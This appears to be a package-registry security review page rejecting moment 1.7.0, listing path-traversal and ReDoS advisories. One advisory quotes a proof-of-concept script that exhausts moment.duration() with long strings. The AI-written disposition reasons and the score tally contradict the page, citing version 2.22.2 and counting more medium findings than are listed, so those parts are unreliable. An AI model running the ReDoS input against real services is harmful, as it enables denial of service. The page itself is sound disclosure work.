All moment versions

[email protected] rejected Risk: 100 MIT

moment @1.7.0

rejected
This version was rejected. It did not pass GreenFlagged's security review and is not served by the registry. The findings and risk dispositions below explain why.
npm Repository Homepage Tarball
100
Risk Score
MIT
License
No
Install Scripts
0
Dependencies
3
Dev Dependencies
96.3 KB
Package Size
Published

Parse, validate, manipulate, and display dates

Maintainers

timrwood

Keywords

momentdatetimeparseformatvalidatei18nl10nender

Dev Dependencies (3)

PackageConstraintRegistry Status
jshint latest auto_approved
nodeunit latest auto_approved
uglify-js latest auto_approved

Risk Dispositions (1 applicable to this version, 1 other)

Accepted rules are downgraded to INFO on future analyses; rejected rules escalate to CRITICAL.

Rule Source Disposition Author Reason
osv:GHSA-8hfj-j24r-96c4 osv reject AI AI (osv): Path traversal advisory affects all moment versions < 2.29.2; this version (2.22.2) is in the affected range. Verdict generalizes.
Show 1 disposition(s) that do not match any finding on this version
Rule Source Disposition Author Reason
osv:GHSA-wc69-rhjr-hc9g osv reject AI AI (osv): ReDoS advisory affects moment >= 2.18.0, < 2.29.4; this version (2.22.2) is in the affected range. Verdict generalizes.

SAST Findings (4)

CRITICAL GHSA-8hfj-j24r-96c4: Path Traversal: 'dir/../../filename' in moment.locale osv

[Always reject] CVSS 7.5 (HIGH) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N ### Impact This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg `fr` is directly used to switch moment locale. ### Patches This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive). ### Workarounds Sanitize user-provided locale name before passing it to moment.js. ### References _Are there any links users can visit to find out more?_ ### For more information If you have any questions or comments about this advisory: * Open an issue in [moment repo](https://github.com/moment/moment)

HIGH GHSA-446m-mv8f-q348: Regular Expression Denial of Service in moment osv

CVSS 7.5 (HIGH) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Affected versions of `moment` are vulnerable to a low severity regular expression denial of service when parsing dates as strings. ## Recommendation Update to version 2.19.3 or later.

MEDIUM GHSA-87vv-r9j6-g5qv: Regular Expression Denial of Service in moment osv

CVSS 6.5 (MEDIUM) — CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H Versions of `moment` prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into `moment.duration()`. ## Proof of concept ``` var moment = require('moment'); var genstr = function (len, chr) { var result = ""; for (i=0; i<=len; i++) { result = result + chr; } return result; } for (i=20000;i<=10000000;i=i+10000) { console.log("COUNT: " + i); var str = '-' + genstr(i, '1') console.log("LENGTH: " + str.length); var start = process.hrtime(); moment.duration(str) var end = process.hrtime(start); console.log(end); } ``` ### Results ``` $ node moment.js COUNT: 20000 LENGTH: 20002 [ 0, 618931029 ] COUNT: 30001 LENGTH: 30003 [ 1, 401413894 ] COUNT: 40002 LENGTH: 40004 [ 2, 437075303 ] COUNT: 50003 LENGTH: 50005 [ 3, 824664804 ] COUNT: 60004 LENGTH: 60006 [ 5, 651335262 ] ``` ## Recommendation Please update to version 2.11.2 or later.

LOW No provenance attestation provenance

Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.

Review Summary

Risk score: 100 (capped from 108). Findings: 1 critical (+40), 1 high (+25), 4 medium (+40), 1 low (+3).

Published to npm: